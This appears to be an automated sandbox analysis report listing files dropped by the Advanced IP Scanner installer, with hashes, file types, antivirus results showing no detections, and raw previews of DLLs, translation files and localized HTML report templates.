SHA1:	AE2ABAC157B6AB18E590F20B35568F03E5FA7A67
SHA-256:	0C5513FF8480C5A7372274E88581D13F89F4066DE5372C56C4220FCAB4C53D85
SHA-512:	3D93C6C33AB9EAA998BDFB1CB8384B7CA111EFF8D39DED2D9FD00CDB3588D6352C5A20CE08AA93704B4734AF61F8E8201FCFEA0D8EB984DAFF0FE888AE73B1E7
Malicious:	false
Preview:	<.d....!..`...B..........VR...;.......;.......;...O...;.......;..AZ...O..Y....[..T....^...A...^..P...(5......G....&..H,..M...K...=...N:......V...B..._...Z,......'.......M....y..Ne......................V$...t..);...t..N....t..X......>....j......5t......@...@...H5..V...f....e......C^.......{.......?...~..1....`..5....e..X#......XK.......`. =...D_..y...&..y...S..%..#...0..#..+.......+.......+......+......+....%..G...../.G....)..H0...X{.Hw9...w.Hw9...k.I....'l.J6......J6....0.J6......J6...F..LD......L.b..X..M.S..?..R.....R.V.......Wi...W..W.T...'.Z.\|..O..[f3..Sd.gc....^.w0K..Ex..H...$.......Y....T......."..2....~..5... d..C....T..,...2...........WN......]9.9.E..>F.L.#.._..M$o.....e.......l8...4....^..G...I....@......@.......P}......W...>......>...x..3..-...l...H.......8..5.l..\W.AV...'-.y....UW...0..QJ......PE......V...tb..3........Y..............Q.......;f......L..(....P..1V...(<.R....0..W.<..\..f.~.. .......2...1........^..4....5..............c..D..;6...^E.q.J..ML..I....o..I

C:\Program Files (x86)\Advanced IP Scanner\is-2I7SK.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	900288
Entropy (8bit):	6.823623458577979
Encrypted:	false
SSDEEP:	24576:Nqaw9+lq6qElzORB37mV60TZAty7dmcvIZPoy4NJ8:Zw90dORBFAZjLy
MD5:	3E0303F978818E5C944F5485792696FD
SHA1:	3B6E3EA9F5A6BBDEDA20D68B84E4B51DC48DEB1D
SHA-256:	7041885B2A8300BF12A46510228CE8D103D74E83B1BAF696B84FF3E5AB785DD1
SHA-512:	C2874029BD269E6B9F7000C48D0710C52664C44E91C3086DF366C3456B8BCE0ED4D7E5BCFE4BDD3D03B11B8245C65F4B848B6DC58E6EA7B1DE9B3CA2FB3348BC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............`.`.`....`.a...`.`..`..:..`..:..`..:....`..:....`..:....`..:..`..:..`.Rich..`.................PE..L....:.U...........!................0.....................................................@A........................P,..f....2.......P...................<...`..dX..`...8...............................@............0...............................text............................... ..`.data...............................@....idata..d....0......................@..@.rsrc........P....... ..............@..@.reloc..dX...`...Z...&..............@..B................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-343PA.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	4.79937338549848
Encrypted:	false
SSDEEP:	24:lFou0BQsuSDQXqbd/Hulm0Kt5RGDz9ScReEhyv:HnkQsRkXqbhHulm0U2Dz9S+s
MD5:	A420CCFD66627A25731173A49B1C98E1
SHA1:	CFEDB045EB2F598E86B375A3C9297F4DE8D18F3A
SHA-256:	FDAD9C0C105BE73D7DCA5B7CB0150D6670EE7BA2824D7DE27CB3F7C9B95CD465
SHA-512:	99DEFA039F7F3C9697B1712658FCDBB33F72F93CD020796A001AEC90F3F46B2759D2DD4BF96F424F66047AB28A315C77DD292625A0514205136DE08C37054236
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Besturingssysteem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabrikant:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Gebruiker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Opmerkingen:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</c

C:\Program Files (x86)\Advanced IP Scanner\is-3CGK6.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26334
Entropy (8bit):	5.237840743757654
Encrypted:	false
SSDEEP:	384:sIX3LNpZy4imY2tBA01s0iMJ/vZYM2jeFxikFq2pkMPcK8LM+OEM4q78nkL9BHDS:TX3xpZy4BaMJ/vZJ2jeFxieN8LMkpk6
MD5:	6AB50593778FB5BD5D5422BDD90595E6
SHA1:	282946268660F41A7484BF19C30B7B958F6A82D4
SHA-256:	132676D1F5044AE5249B764B0CD4B67993932D121FBDDC13DB2AE75961562F0F
SHA-512:	359B8EE830E74575BDB7519F98180DD3440BBBE03DE9247F2FCF6A3EFD721DD1F56DB96DBF0D47E847EA6B6365BD5AD97DF6D5B277F5926622918FF05578DB37
Malicious:	false
Preview:	<.d....!..`...B..........R....;...J...;...c...;.......;.......;..>....O..U....[..Q....^..+....^..M...(5...y..G.......H,..J...K...:...N:......V...?..._...V.......%.......K....y..Ki......................R....t..'....t..K....t..UK.....<....j......5t......@...=...H5..S...f...+.......@........;...........~...l...`..2....e..T.......T.......... =...A...y......y......%..!...0..!..+.....+.+.......+....Z.+....$.+....#..G.......G....'].H0...U%.Hw9.....Hw9.....I....%^.J6......J6......J6......J6...D).LD....d.L.b..Ur.M.S..<j.R.....0.V....+..Wi...Tr.W.T...m.Z.\|..L..[f3..P..gc......w0K..B...H...".......VF...T...a..."..0L...~..2p.. d..@....T..*W..2...........S.......Y..9.E..;Z.L.#..\..M$o.....e.....".l8...2....^..D^..I....>......=.......MY......S...>......>...:..3..+e..l...E.......5..5.l..X..AV...%'.y....Q....0..N.......M.......SA..tb..1.......................Nk......8.......I..(....M..1V...&(.R....-..W.<..Y}.f.~...f....../...1........^..1k...5..............c..A@.;6...[..q.J..JL..I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-3K2R2.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.97635016555389
Encrypted:	false
SSDEEP:	384:UjcW2hWX7QA0GftpBju0dtTxZlBRAk9l3:yAwyi8or1RAO
MD5:	3B038338C1EB179D8EEE3883CF42BC3E
SHA1:	EA97CF2EE16EF2DF3766A40C6CE33C8BE5F683B2
SHA-256:	C17786E9031062F56E4B205F394A795E11EF9367B922763DDF391F2ACAB2E979
SHA-512:	1A6D8FC065237BF0DBBA18C777958522697B6BC2BE1B16586870A0C06178D65B521F66F522BF5636DF793E4AC8A2A3DE780B3C7062273A11F52A381EE851ECE6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......Ts....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-3SOVH.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18112
Entropy (8bit):	7.0782836442636174
Encrypted:	false
SSDEEP:	384:MZeW2hWngbCA0GftpBjPEGVlvQyURz87X:3n8ixEQvU2L
MD5:	7697F94ED76B22D83D677B999EDFC2E1
SHA1:	42AFB5B8E76B8B77D845156B7124CC3E0C613F91
SHA-256:	50FD585270FA79FD056EC04B6991D0E65CCA28C1116834A59D5591F8D8C2C214
SHA-512:	1EF120BAA532692D22F8939D9F149035E38DA6B65B889BA6CCB7858596718D569B0B9B35AD3609DE9DAF229553254966BF3D5A6ABC4AF1FF56732CE8560B31C8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-41CLQ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1155
Entropy (8bit):	4.803303336966706
Encrypted:	false
SSDEEP:	24:lFouq/suSqY/Xq96P/HZryq90Kt5RGDQz9wgReEhyv:HXq/sRqqXq+HZOQ0U2DQz9was
MD5:	27C167C1E5624DC7F4D0256ABAA8632F
SHA1:	7D1E07791656B4EE2B26264D28ED3DEC9CD30C9A
SHA-256:	E84981884815C811EB43482F59016F6920EC3D65C22F6A3CE107CD48E8D91863
SHA-512:	C63F4C7F0CBF7F86C58EF8CB9E4AE5DDDEEB207C47CD11D2CAF3BFEACE1F9F8BCB9A4C52087D2D09469BF4F50133309ACDED2C0572351902761F31B9070E8794
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stare:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistem de operare:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produc.tor:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utilizator:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tip:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dat.:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comentarii:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Serviciu</center></b></td><td><b><center>Detalii</

C:\Program Files (x86)\Advanced IP Scanner\is-46V0R.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23232
Entropy (8bit):	6.854338104703726
Encrypted:	false
SSDEEP:	384:5b7hrKIW2hW6SUA0GftpBjoQt1TlI663UMp:5bNrKcziZzW66kMp
MD5:	AE3FA6BF777B0429B825FB6B028F8A48
SHA1:	B53DBFDB7C8DEAA9A05381F5AC2E596830039838
SHA-256:	66B86ED0867FE22E80B9B737F3EE428BE71F5E98D36F774ABBF92E3AACA71BFB
SHA-512:	1339E7CE01916573E7FDD71E331EEEE5E27B1DDD968CADFA6CBC73D58070B9C9F8D9515384AF004E5E015BD743C7A629EB0C62A6C0FA420D75B069096C5D1ECE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@......@.....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-4NCQS.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26514
Entropy (8bit):	5.365287004508335
Encrypted:	false
SSDEEP:	384:nUzD+5WAlXcVhAB44F7JjbP2HvOqwtew5Mg+Xl+UWZhS4vr7:nMGWAlXcV+m4F7JjbP2P9wxMg+X4f9
MD5:	31966D909B8293307AC3545ACA55CD13
SHA1:	1B49E43C0109445BA5068E2ED8422CB308D99B12
SHA-256:	81B17400011DC60FD3CDBEDA6F52E3E848B0A8C754703CD32E4DBEB82A77C14B
SHA-512:	7CF39F060267A043DEAA52C7A1F7DBA00EB24957264C349D9322BD1E8506151A566E26FAB9B45ED5FEB7140EBE05A8AC89062DAF5D2FA4AE4845735036694EE8
Malicious:	false
Preview:	<.d....!..`...B..........S....;...^...;.......;.......;.......;..>....O..VL...[..R&...^..,C...^..M...(5......G.......H,..K...K...;(..N:...x..V...?..._...W.......&.......KG...y..K................\......Sb...t..'....t..L&...t..U......;....j......5t......@...=...H5..T#..f...,g......@........M...........~../....`..3...e..Um......U.......... =...A...y......y...9..%.."...0.."7.+.....7.+.......+....f.+......+....#..G.......G....'..H0...U..Hw9...5.Hw9.....I....%..J6....0.J6......J6....b.J6...D..LD....\|.L.b..V..M.S..<n.R.......V....,..Wi...U..W.T...S.Z.\|..L..[f3..P..gc......w0K..B...H...".......W....T...s..."..0....~..2... d..A....T.....2...........T.......Z..9.E..;..L.#..]g.M$o.....e.......l8...2Q...^..DL..I....0......=.......M.......TK..>......>...^..3..+...l...E.......5..5.l..Y..AV...%o.y....R....0..Nz......Mo......S...tb..1`...............m......N.......8.......I..(....N..1V...&\|.R.....#.W.<..Zc.f.~...p......0j..1........^..1....5...O......h...c..An.;6...[..q.J..J...I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-4RR0D.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.021897050678374
Encrypted:	false
SSDEEP:	384:5yMvJW2hW2gbCA0GftpBjMv3ulvQyURz8n:5yMvn88ikEvU2n
MD5:	687533A89B43510CCE4D8B2ECB261AA0
SHA1:	4004BA63880A92042C106FF6A549C6F5F69CE05D
SHA-256:	E7272FF3B00508732896BF96F8DAB5AD32FE4531746AB1C228C315F1B4D48156
SHA-512:	6A61DD13939BF61342278EFFA07D2654219032F9523D3D552275BD60BD3B125DAD13737924D33F6619C5A7CCACE008B37C3330451411D3BD09E1D2B5064F9AAC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......A....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-4SNJ1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	5.068076577523285
Encrypted:	false
SSDEEP:	24:lFokcsuSRVXqhayHmP9a0Kt5RGDD4ReEhyv:HpcsRPXqhayHmP9a0U2DDSs
MD5:	1E41F2F1C303F750C96681515894C7B4
SHA1:	A6B4E2EC874030D50A0156E4A6CF2EF952F11455
SHA-256:	350321BFDAD2FD43E09E94DC59F47888B21BECA6EDAE3D23A7C90B7E246611C0
SHA-512:	ACA0D361A7EE82263804FC9C210FD829EFD6FD633F3053A9D7DE801C620FC4B981337721B6FEDA6D05F0E80289BC874B7B0AAE9B1E74C0320C14F00DA258B7FD
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>..</center></b></td><td><b><center>....</cent

C:\Program Files (x86)\Advanced IP Scanner\is-56ICT.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24768
Entropy (8bit):	6.784463110154403
Encrypted:	false
SSDEEP:	384:vUFVhjW2hWcgbCA0GftpBjH95mnlvQyURz8te:szC8iEvU2Y
MD5:	32D7B95B1BCE23DB9FBD0578053BA87F
SHA1:	7E14A34AC667A087F66D576C65CD6FE6C1DFDD34
SHA-256:	104A76B41CBD9A945DBA43A6FFA8C6DE99DB2105D4CE93A717729A9BD020F728
SHA-512:	7DAD74A0E3820A8237BAB48F4962FE43E5B60B00F003A5DE563B4CF61EE206353C9689A639566DC009F41585B54B915FF04F014230F0F38416020E08C8A44CB4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......h....@.............................a............0...............$...<..............8............................................................................text...q........................... ..`.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-56MED.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1149
Entropy (8bit):	4.78207214825378
Encrypted:	false
SSDEEP:	24:lFoBbqsuSqrXq9CHRM9830Kt5RGDeqVReEhyv:HSbqsRqrXqgHw830U2D9Xs
MD5:	470C4551612D8025E2C1FF7129C75577
SHA1:	BA632F06A6C8A7A3E7E53FD6359BEDF2136399BB
SHA-256:	8C04F3998E1827EE98EDB0D17A591F507F75478C88B8A98DA5FABD55DDCFA18E
SHA-512:	21D3AD77522C40E2E4B5C75805EA8460EF6C1ABC4DAA7BD95E1AA7B5387DDA83589EF8A1DA6A915B975524C8B2081CEEF274AD87C3EE1E4EFD02C581D1D33A6C
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stato:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operativo:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produttore:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utente:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Commenti:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servizio</center></b></td><td><b><center>Dettagli</center

C:\Program Files (x86)\Advanced IP Scanner\is-5BCDU.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73408
Entropy (8bit):	5.811008103709619
Encrypted:	false
SSDEEP:	1536:nt2b2De5c4bFX2Jy2cvxXWpD9d3334BkZnkPgE79g:nw2De5c4bFX2Jy2cvxXWpD9d3334BkZ3
MD5:	1DD5666125B8734E92B1041139FA6C37
SHA1:	22E9566352E77AB15A917B45A86C0DC548431692
SHA-256:	D0FF5F6BB94961D4C17F0709297A6B5A5FA323C9AC82F4FE27187912B4B13CF3
SHA-512:	420B9184842ECD7969BF75F0D8A62569725624AE413C83EE3B6F26973318B4170287F657F2BE8DD3E7FC71264D69B2203E016D078615AD6E31E65033D5C59654
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................................................................@.............................8................................<..............8............................................................................text...H........................... ..`.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-5V8TO.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27204
Entropy (8bit):	5.005345988323232
Encrypted:	false
SSDEEP:	384:OpTFOkqnz8B1NM9aQ3T07mnagn7UMHJEt5jTlAXSHjcvHrP:ORFInz8BbM9aQ3w7gaMJk0
MD5:	53839022420E21292B81995749C5BCBD
SHA1:	D050A1FD64DCA4D57F9C15B71838811F3C5CF51B
SHA-256:	44900BCBB56194E2153DD1F0963DC5947C817C2A33D3A55E39A3DCDE1FDEB66A
SHA-512:	6D93BB2E3C193F21EC86456694B447899C21CC3CCE606307E9EAB3F8A8F0D92DE75A167C94F20F8AC45BFEE5F7E9192257D5F17AF46DF44598DE77E6FB5E008B
Malicious:	false
Preview:	<.d....!..`...B..........Vp...;...`...;.......;.......;.. ....;..A....O..Y4...[..U ...^.......^..Q...(5......G.......H,..N...K...=...N:......V...B..._...Zj......((......NE...y..N................2......VH...t..)....t..O6...t..X......>....j......5t......@...@...H5..W...f...........C........q...........~..1~...`..5....e..XW......X.......... =...D...y......y......%..$X..0..$..+.......+.....J.+....R.+......+....&..G.......G....*..H0...X..Hw9.....Hw9.....I....'..J6....0.J6......J6....Z.J6...G..LD......L.b..Y..M.S..?T.R.......V..../..Wi...W..W.T.....Z.\|..O..[f3..S..gc......w0K..E...H...%1......Y....T......."..3D...~..5`.. d..D1...T..-K..2...........Wv......]..9.E..>f.L.#..`'.M$o.....e.....f.l8...5....^..GL..I....B......@.......P.......W5..>...'..>......3......l...H.......8R.5.l..\..AV...'..y....U....0..Q.......P.......V...tb..3.......................Q.......;.......L..(....Q>.1V...(..R....0..W.<..]..f.~..!.......2...1........^..4i...5...u......H...c..Dr.;6...^..q.J..M...I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-6KKGK.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1800
Entropy (8bit):	4.977566387382036
Encrypted:	false
SSDEEP:	48:ngn27UxOUZyUejUC3UCJ8UZzoUH0OUvMU70qlUQCU2DYlO:gj7Lfdk3tM/4qyMVO
MD5:	C342B5AAD7F710F39DD20641A1B3DF78
SHA1:	7C3636884EE5A170230CAD8D3B5BB875E59C8DF8
SHA-256:	A550CB4323FFBC96B8BED4E5A8F1A82E0EAAAF2987FF794DB55C7D48FB1CAFDC
SHA-512:	CEC17544EB60EB296A742AF55D010EA5D31D3DC34E9DF809B58EFA074F195FA19032C6190FEBBE801E16BDE7A18C5463E35ADC334F34ABEC7B1DFD1E0632BCF6
Malicious:	false
Preview:	<hr>..<h3 align="right" style="margin-right:2em">{name}</h3><p></p>..<table align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right"><b>......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right"><b>.... .......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right"><b>...... .......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right"><b>NetBIOS:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{user}</td><td dir="rtl" align="right"><b>........:</b></t

C:\Program Files (x86)\Advanced IP Scanner\is-78CDM.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1152
Entropy (8bit):	4.835031850395569
Encrypted:	false
SSDEEP:	24:lFouJsuSMBXqHHZlL0Kt5RGDV9iReEhyv:HnJsRAXqHHZlL0U2DV9os
MD5:	8723B14E9398038715746AD9E3BDE732
SHA1:	E90F353839A5C6A2AC6DB8D1860D73077CCD6260
SHA-256:	201854FBE199471A6756CAC6649F716653304D03C10E22BB1DD6D3D04BF6E5F9
SHA-512:	F5C813713BEBE817B8C6DCDAB00B6314C667C986589943AA4EC173C924281379387CB92241E265BD3EDFE12D9F0EFA6036DF9C832E7F70D04F9ED88B72478E4C
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativni sistem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Proizvo.a.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Korisnik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tip:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentari:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Usluga</center></b></td><td><b><center>Detalji</cen

C:\Program Files (x86)\Advanced IP Scanner\is-7ATMD.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27444
Entropy (8bit):	4.672755214321859
Encrypted:	false
SSDEEP:	384:l3POS+SsVKz36+e26v7powzg+fhSsbiGr:hORlVKz3Ze2y7pV00
MD5:	5323FC9E0D0110FE16F649B91167E604
SHA1:	88DBC51B2F91B23DC75A2EB1A64EC8FFE05C7FDB
SHA-256:	660389BE673840C90CC9F93C9BE9A16E721F9A60C2934A9468C7307044C890E1
SHA-512:	526655F5663509FBB545E67F643CEEB2D5FE558FBF02466AC58733ADEE8BDF8996B3FCB9CCBB860E49FADEF3B4E27D4C127FD4F3AD6FDCB8EEE27DC993CA21BC
Malicious:	false
Preview:	<.d....!..`...B..........W(...;...N...;.......;.......;.. ....;..B6...O..Y....[..U....^.......^..Q...(5...w..G.......H,..N...K...>...N:......V...C..._...[2......(T......N....y..Oa.......}.......V......V....t..)....t..O....t..Y......?....j......5t......@...AG..H5..W...f.../.......D:...................~..1....`..6....e..Y.......Y5......... =...EO..y......y......%..$>..0..$g.+.......+.......+....H.+......+....&..G.......G....*G.H0...Ye.Hw9...7.Hw9...'.I....'..J6......J6......J6....h.J6...G..LD......L.b..Y..M.S..?..R.......V..../=.Wi...X..W.T.....Z.\|..P..[f3..T..gc......w0K..Fv..H...%.......Z....T......."..3....~..5... d..D....T..-{..2....=......X.......^c.9.E..>..L.#..a..M$o.....e.......l8...5K...^..H...I....j......Az......QW......W...>...]..>......3......l...I~......8..5.l..]i.AV...'..y....V/...0..R&......Q.......W...tb..42...............K......R.......<.......M~.(....Q..1V...(..R....0..W.<..]..f.~..!.......3 